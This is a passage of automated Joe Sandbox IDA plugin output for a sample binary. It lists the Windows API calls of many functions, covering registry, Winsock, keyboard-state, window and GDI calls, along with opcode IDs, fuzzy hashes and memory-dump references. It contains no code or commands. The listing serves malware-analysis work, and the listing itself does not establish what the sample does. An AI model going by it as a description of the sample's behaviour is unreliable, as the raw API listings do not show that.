                                                                                                • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                                • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                                                • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                                • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                                                APIs
                                                                                                • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                                                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: Variant$Copy$ClearErrorInitLast
                                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                • API String ID: 3207048006-625585964
                                                                                                • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                                                • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                                                APIs
                                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                                                  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                                                • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                                                • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                                                • _memmove.LIBCMT ref: 004656CA
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                                                • WSACleanup.WSOCK32 ref: 00465762
                                                                                                Similarity
                                                                                                • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                                                • String ID:
                                                                                                • API String ID: 2945290962-0
                                                                                                • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                                                • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                                                APIs
                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                                                • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                                                • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                                                • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                                                • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                                                • String ID:
                                                                                                • API String ID: 1457242333-0
                                                                                                • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                                                • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConnectRegistry_memmove_wcslen
                                                                                                • String ID:
                                                                                                • API String ID: 15295421-0
                                                                                                • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                                                • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                                                APIs
                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                • _wcstok.LIBCMT ref: 004675B2
                                                                                                  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                • _wcscpy.LIBCMT ref: 00467641
                                                                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                • _wcslen.LIBCMT ref: 00467793
                                                                                                • _wcslen.LIBCMT ref: 004677BD
                                                                                                  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                                                • String ID: X
                                                                                                • API String ID: 780548581-3081909835
                                                                                                • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                                                • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                                                • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                                                • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                                                APIs
                                                                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                                                • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                                                • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                                                • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                                                • CloseFigure.GDI32(?), ref: 0044751F
                                                                                                • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                                                • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                • String ID:
                                                                                                • API String ID: 4082120231-0
                                                                                                • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                                                • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                                                APIs
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                                                • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                                                • String ID:
                                                                                                • API String ID: 2027346449-0
                                                                                                • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                                • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                                                • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                                • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                                                APIs
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                • GetMenu.USER32 ref: 0047A703
                                                                                                • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                                                • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                                                • _wcslen.LIBCMT ref: 0047A79E
                                                                                                • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                                                • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                                                • String ID:
                                                                                                • API String ID: 3257027151-0
                                                                                                • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                                • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                                                • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                                • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                                                APIs
                                                                                                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastselect
                                                                                                • String ID:
                                                                                                • API String ID: 215497628-0
                                                                                                • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                                                • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                                                • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                                                • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                                                APIs
                                                                                                • GetParent.USER32(?), ref: 0044443B
                                                                                                • GetKeyboardState.USER32(?), ref: 00444450
                                                                                                • SetKeyboardState.USER32(?), ref: 004444A4
                                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
• Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
• Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
• Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
APIs
• GetParent.USER32(?), ref: 00444633
• GetKeyboardState.USER32(?), ref: 00444648
• SetKeyboardState.USER32(?), ref: 0044469C
• PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
• PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
• PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
• PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
• Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
• Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
• Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
APIs
• SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
• ImageList_Remove.COMCTL32(?,?), ref: 004553D3
• SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
• String ID:
• API String ID: 2354583917-0
• Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
• Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
• Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
• Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
APIs
• LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
• GetProcAddress.KERNEL32(?,?), ref: 004648F7
• GetProcAddress.KERNEL32(?,00000000), ref: 00464916
• GetProcAddress.KERNEL32(?,?), ref: 0046495A
• FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: #v
• API String ID: 2449869053-554117064
• Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
• Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
• Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
• Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
• Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
• Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
• Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
APIs
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
• SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
• EnableWindow.USER32(?,00000000), ref: 00448B5C
• EnableWindow.USER32(?,00000001), ref: 00448B72
• ShowWindow.USER32(?,00000000), ref: 00448BE8
• ShowWindow.USER32(?,00000004), ref: 00448BF4
• EnableWindow.USER32(?,00000001), ref: 00448C09
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Window$Enable$Show$MessageMoveSend
• String ID:
• API String ID: 896007046-0
• Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
• Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
• Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
• Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
APIs
• SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
• GetFocus.USER32 ref: 00448ACF
• EnableWindow.USER32(?,00000000), ref: 00448B5C
• EnableWindow.USER32(?,00000001), ref: 00448B72
• ShowWindow.USER32(?,00000000), ref: 00448BE8
• ShowWindow.USER32(?,00000004), ref: 00448BF4
• EnableWindow.USER32(?,00000001), ref: 00448C09
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Window$Enable$Show$FocusMessageSend
• String ID:
• API String ID: 3429747543-0
• Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
• Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
• Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
• Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
APIs
  • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
  • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
  • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
• KillTimer.USER32(?,?,?,?,?), ref: 004012D3
• SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
• Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
• Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
• Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
• String ID:
• API String ID: 3300667738-0
• Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
• Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
• Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
• Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D459
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
• __swprintf.LIBCMT ref: 0045D4E9
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu$\VH
• API String ID: 3164766367-2432546070
• Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
• Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
• Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
• Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
APIs
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
